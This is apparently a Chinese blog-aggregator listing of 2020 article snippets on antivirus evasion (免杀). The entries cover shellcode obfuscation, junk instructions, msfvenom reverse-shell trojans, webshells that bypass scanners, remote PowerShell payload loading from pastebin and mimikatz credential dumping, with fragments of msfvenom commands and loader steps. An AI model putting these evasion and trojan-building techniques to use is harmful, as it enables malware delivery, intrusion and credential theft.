veil免杀

关于CS上线Linux主机(CrossC2)

用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。
Adminxe·2020-08-18 18:21

免杀简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)

二次编译也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查杀,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码:源代码:htt
Shanfenglan7·2020-08-18 18:09

免杀简述1(花指令/改特征码/shellcode加载器)

杀毒软件查杀思路杀软常见扫描方式与技术1、扫描压缩包技术:即是对压缩包案和封装文件作分析检查的技术。2、程序窜改防护:即是避免恶意程序借由删除杀毒侦测程序而大肆破坏电脑。3、修复技术:即是对恶意程序所损坏的文件进行还原4、急救盘杀毒:利用空白U盘制作急救启动盘,来检测电脑病毒。5、智能扫描:扫描最常用的磁盘,系统关键位置,耗时较短。6、全盘扫描:扫描电脑全部磁盘,耗时较长。7、勒索软件防护:保护电
Shanfenglan7·2020-08-18 18:38

程序免杀技术之——花指令

当然,花指令也广泛运用到免杀技术中,不过随着杀毒技术以及虚拟机技术的不断升级,单一的加花已经不能避免
zhu2695·2020-08-18 18:53

msfvenom木马生成+免杀+壳(实测并不能免杀)

msfvenom选项:-p,--payload有效载荷使用。指定一个有效的自定义载荷--payload-options列出有效载荷的标准选项-l,--list[type]列出一个模块类型。选项有:有效载荷,编码器,NOP,所有-n,--nopsled在一个nopsled[长度]的大小对有效载荷-f,--format输出格式(使用-一个列表的帮助格式)--help-formats列出可用的格式-e,
weixin_34342992·2020-08-18 05:09

TLS--线程局部存储

https://blog.csdn.net/u013761036/article/details/54960277这个东西并不陌生了,之前写过了一个关于这个的应用,利用静态TLS姿势实现代码段静态加密免杀或者所谓的加壳思路
Answer-3·2020-08-18 03:09

Kail Linux渗透测试教程之免杀Payload生成工具Veil

KailLinux渗透测试教程之免杀Payload生成工具Veil免杀Payload生成工具——VeilKailLinux渗透测试教程之免杀Payload生成工具VeilVeil是一款利用Metasploit
ciqihui0949·2020-08-17 21:48

木马的伪装与免杀

0x01:我们依靠msf生成简单的shellcode免杀msfvenom-pwindows/meterpreter/reverse_tcp-ax86--platformLHOST=XXXLPORT=XXX-ex86
梭哈王·2020-08-17 16:20

一句话木马免杀(截止2020年8月16日通杀D盾、安全狗,微步,webshellKiller)

首先一句话木马:D盾扫描,5级分开写:1D盾扫描,4级使用可变函数的技巧(PHP支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途)1D盾扫描,3级使用array_map()函数(为数组的每个元素应用回调函数)1D盾扫描,2级把assert处理一下1D盾扫描,1级既然显示数组字符串合并,那么
ABKing·2020-08-16 23:00

免杀花指令编写组合----非常常用,免杀必备

(该免杀花指令经典,压缩可
zhu2695·2020-08-16 17:19

免杀汇编教程(汇编花指令)

相信很多朋友都做过木马免杀,早期的免杀都是加壳和改特征码,现在免杀技术已经发展到花指令免杀,改壳之类的,而这些需要一定的汇编知识,但是汇编却不是一块容易啃的骨头,所以我写了这篇菜鸟版的免杀汇编教程,帮助小菜们快速入门
zacklin·2020-08-16 17:42

《黑客免杀攻防学习笔记》——C++设计一个简单的壳1

本文中的代码均来自《黑客免杀攻防》,如要转载,需写明来源,请勿用于非法用途,作者对此文章中的代码造成的任何后果不负法律责任。
Traxer·2020-08-16 16:00

花指令

完全花指令免杀学习花指令,简称“花”,意思是像花儿一样的指令。花儿是干什么的呢?当然是吸引你去观赏的,就是让你(也包括杀软)只顾去观赏美丽“花朵”,而忘记或者忽略了“花朵”后面的“果实”。
weixin_33939843·2020-08-16 15:49

浅谈利用cs进行免杀的思路总结

思路①利用c语言+veil实现免杀#include"pch.h"//可以删除#include#include#pragmacomment(linker,"/subsystem:\"windows\"/entry
goddemondemongod·2020-08-16 14:31

后渗透攻防的信息收集 -- MottoIN

常用来获取windows密码的工具1.mimikatz2.wce3.getpass4.QuarksPwDump5.reg-sam6.pwdump77.procdump.exe+mimikatz…….B.免杀抓取密码的两种方
qq_27446553·2020-08-16 14:33

第五章 花指令与免杀 读书笔记

1为了保护真正的果实,所以使用花朵是别人迷惑.花指令不是加密代码,它分两种:a夹杂运行b高级语言的花指令应用,程序在运行时会因为花指令而改变原有的流程.该书暂不涉及,据称"比较复杂且效果有限"2脚本木马花指令3花指令根基-汇编语言a认识汇编80x86汇编大致可分为这么几个功能组:数据传输指令逻辑运算指令串操作指令控制转移指令处理器控制指令b增加反汇编添加任意功能:知识点:汇编调用API函数遵循sd
dalerkd·2020-08-16 12:13

Metasploit使用后门程序渗透Windows

终端中运行veil-evasion输入list查看可用模块这里使用7)c/shellcode_inject/flatc输入use7generate1(default)回车选择默认的windows/meterpreter
盗才生·2020-08-16 11:23

Web渗透之MSF框架——msfvenom与免杀木马制作

文章目录生成常见的反向连接木马反向连接的优势:Windows:Linux:MAC:PHP:Asp:Aspx:msfvenom参数介绍生成免杀木马360免杀木马腾讯管家免杀木马免杀木马测试写在最后生成常见的反向连接木马连接一般分为正向连接和反向连接
Mr. Wanderer·2020-08-16 11:17

木马免杀之汇编花指令技巧

木马免杀之汇编花指令技巧作者:逆流风(发表于《黑客X档案》07.07,转载注明出处)相信很多朋友都做过木马免杀,早期的免杀都是加壳和改特征码,现在免杀技术已经发展到花指令免杀,改壳之类的,而这些需要一定的汇编知识
weixin_30730151·2020-08-16 11:16

[远控免杀]msf生成木马的信息储备

1.msfvenom的命令使用Options:-p,--payload指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l,--list[module_type]列出指定模块的所有可用资源.模块类型包括:payloads,encoders,nops,all-n,--nopsled为payload预先指定一个NOP滑动长
千^里·2020-08-15 07:53

DeFi热潮背后仍问题重重,生态逐渐完善的原力协议能否成为“破局者”?

曾经热极一时的DeFi明星项目Dharma更是关闭了全部产品的运行,由Paradigm、红杉资本等投资的Veil也在2019年7月宣布关闭。
baidu_39383304·2020-08-15 05:24

远控软件GHOST源码免杀

远控软件gh0st源码免杀远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控木马,既然要利用,我们就做好源码基础上的木马免杀工作。
HEJSCLK·2020-08-13 14:11

cobalt strike木马免杀

0x001-针对powershell免杀工具:Invoke-Obfuscation操作实例:1、利用CS生成powershell木马2、进入invoke-Obsfuscation文件,使用powershell
shinyruo开始了·2020-08-12 16:29

免杀技术有一套(免杀方法大集结)(Anti-AntiVirus)

00.概述什么是免杀
anhkgg·2020-08-11 21:02

汇编"免杀"基础知识

一.机械码,又称机器码.ultraedit打开,编辑exe文件时你会看到许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码,这些数码就是机器码.修改程序时必须通过修改机器码来修改exe文件.二.需要熟练掌握的全部汇编知识(只有这么多)不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了cmpa,b比较a与bmova,b把b的值送给aret返回主程序nop无作
艾伦之家·2020-08-11 11:54

渗透测试之权限维持

Web后门1:隐藏后门文件(将文件设置为隐藏)2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。"
QingChenHT·2020-08-11 10:35

入侵局域网的全攻略

入侵工具:一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版4.5.
清水迎朝阳·2020-08-10 21:45

远控免杀专题 14 ---AVIator

0x01免杀能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
go0dStudy·2020-08-10 20:40

病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御

JS脚本木马之所以会如此泛滥,与它的编写简单、易于免杀以及难以封堵等特点息息相关。而我们本次的课程也会围绕它的这三个
ioio_jy·2020-08-10 09:07

木马免杀基础学习

参考书籍:《木马攻防全攻略》--万立夫编著--电脑报电子音像出版社参考链接:https://www.52pojie.cn/thread-32064-1-1.html推荐的免杀思路链接:http://www.cnhonkerarmy.com
fa1lr4in·2020-08-07 23:42

基于PowerShll的免杀思路,过国外主流杀毒

1)首先准备一个你的RAT小马,可以是任何exe后缀的文件2)使用工具将exe转换为Base64格式3)将Base64字符串上传到pastebin.com,或者github,得到一个可访问的raw的地址4)将得到的raw地址,替换下面ps代码中的URL,并将该文件保存为Injecttopowershell.vbsCreateObject("WScript.Shell").Run"PowerShel
FFE4·2020-08-07 23:27

利用Office公式编辑器特殊处理逻辑的免杀技术分析(CVE-2017-11882)

利用Office公式编辑器特殊处理逻辑的免杀技术分析(CVE-2017-11882)阅读量44989|评论3分享到:发布时间:2018-09-1110:00:14背景2018年8月24日,360威胁情报中心捕获到一个专门为乌克兰语使用者设计的钓鱼文档
betteroneisme·2020-08-07 23:12

免杀篇】远控免杀专题(22)-SpookFlare免杀(VT免杀率16/67)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01SpookFlare介绍0x02安装SpookFlare0x03SpookFlare使用说明0x04利用SpookFlare生成后门0x05SpookFlare小结免杀能力一览表
Agan '·2020-08-07 23:17

免杀篇】远控免杀专题(53)-白名单WMIC.exe执行payload

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01WMIC介绍0x02WMIC使用0x03使用WMIC远程加载payload利用metasploit自定义免杀0x01WMIC介绍WMIC扩展
Agan '·2020-08-07 23:17

java webshell jsp 木马攻防 简介

目录基础知识JSP标签JSP中的字符串混淆方式类反射类加载对命令执行JSP一句话免杀原型类反射绕过寻找其他类对于冰蝎JSP一句话的免杀免杀D盾免杀百度scanner总结防范方法其他类型的webshell
whatday·2020-08-06 13:32

捆绑后门的艺术--CobaltStrike backdoor分析

其中,捆绑型后门是攻击者较为喜欢的一种后门,因为其具有较好的隐蔽性及免杀效果。下面,就来剖析一下该类后门的捆绑及免杀原理。
systemino·2020-08-05 11:56

使用MSF生成的shellcode打造免杀payload

环境:1.Kali攻击机IP:192.168.114.1402.使用win7生成exe步骤:使用msfvenom生成shellcode:msfvenom-pwindows/meterpreter/reverse_httplhost=192.168.114.140lport=5555-fcwin7中使用Visualstudio创建Win32控制台项目(如果装了gcc,也可以使用gcc编译):选择空项
zkwniky·2020-08-04 22:04

第十六章 免杀

.防病毒软件▪恶意程序最主要的防护手段–杀毒软件/防病毒软件–客户端/服务端/邮件防病毒▪检测原理–基于二进制文件中特征签名的黑名单检测方法–基于行为的分析方法(启发式)▪事后手段–永远落后于病毒发展免杀技术
baihuang8062·2020-08-04 13:27

nps内网渗透利用

0x00前言对比了比较多的代理工具,如ew流量不稳定,容易断;frsocks目前免杀,也是容易断。frp需要落地配置文件,不符合渗透的规则。reg正向的socks,速度比较慢,扫描是个问题。
weixin_30883311·2020-08-02 19:14

免杀篇】远控免杀专题(31)-powershell加载shellcode免杀-4种方式(VT免杀率5-58)

加载shellcode介绍0x02powershell的几个基础知识powershell版本问题常见执行方式执行策略0x03powershell加载shellcode方法1:msf-ps1本地执行(VT免杀
Agan '·2020-08-02 15:07

Powershell Empire 绕过AV实现远控

虽然这款框架集成了从漏洞发现到漏洞利用的几乎所有功能,但是不得不承认其在木马后门的免杀方面现如今已经不足以应付一些流氓杀软了。但是,PowershellEmpire可以。
weixin_34037977·2020-08-02 14:33

empire用法笔记

其中集成了很多内网的一些工具以及命令,使用方便,且empire生成的木马文件基于powershell,所以在windows平台上有很好的免杀效果。结合msf使用更是如虎添翼。
aFa攻防实验室·2020-08-02 13:45

[源码和文档分享]基于VC++的WIN32 API界面编程实现的百战天虫小游戏

HERO阵营的目标为阻止精灵继续逍遥法外,但是为了保护珍稀精灵,HERO需要尽量避免杀死精灵,并且收服精灵。WIZARD阵营的目标为杀死HERO阵
ggdd5151·2020-08-01 07:26

通过xencrypt免杀invoke-mimikatz.ps1

0x01简介xencrypt目前测试只在windows2012powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。0x02使用1、下载invoke-mimikatz.ps1到同级目录下。https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltratio
`GGyao·2020-07-30 15:15

如何在目标内网中发现更多存活主机

win下进行各种arp扫描:1#start/barpscan.exe-t192.168.3.0/24>>result.txt利用powershell脚本进行arp扫描,这也是个人比较推荐的方式,轻量且免杀效果较
weixin_30305735·2020-07-30 12:46

柳宗元的高级隐喻故事:《种树郭囊驼传》顺从人的天性,自然发展

左传战国策,很多士大夫再劝谏国君的时候都是大量的都是大量的引用寓言故事,以避免杀身之祸,取得了非常好的劝谏的效果。
正念教练张林宝·2020-07-30 11:20

病毒知识与常见杀毒软件了解

病毒常用的免杀技术加壳加花变种升级杀毒引擎杀毒引擎的任务:对指定的文件或程序进行判断是否合法。脱壳分为硬脱壳和动态脱壳虚拟机脱壳引擎技
weixin_30929195·2020-07-30 02:24

CrypMic分析报告

通过函数返回地址+函数第一个参数来确定跳转到的地址,这里主要用于免杀和增加逆向分析难度。释放恶意代码。多次跳转后到达PE解密的地方,首先从第一个区段中获取到用于PE替换的数据
weixin_30527143·2020-07-30 02:39

TideSec远控免杀学习四(BackDoor-Factory+Avet+TheFatRat)

参考资料利用BDF向EXE文件植入后门:https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/backdoor-factory使用简介:https://www.lstazl.com/
fa1lr4in·2020-07-29 09:12

教你制作一个木马免杀的360

制作一个360免杀的木马我们用到工具:kail:利用msfvenom(美少妇)MSFvenom的常用命令1、我们进入到msf里面在msf后生成一个exe的木马文件,这-p就是生成window模块playload
EdisonJH·2020-07-29 09:39
上一页 8 9 10 11 12 13 14 15 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他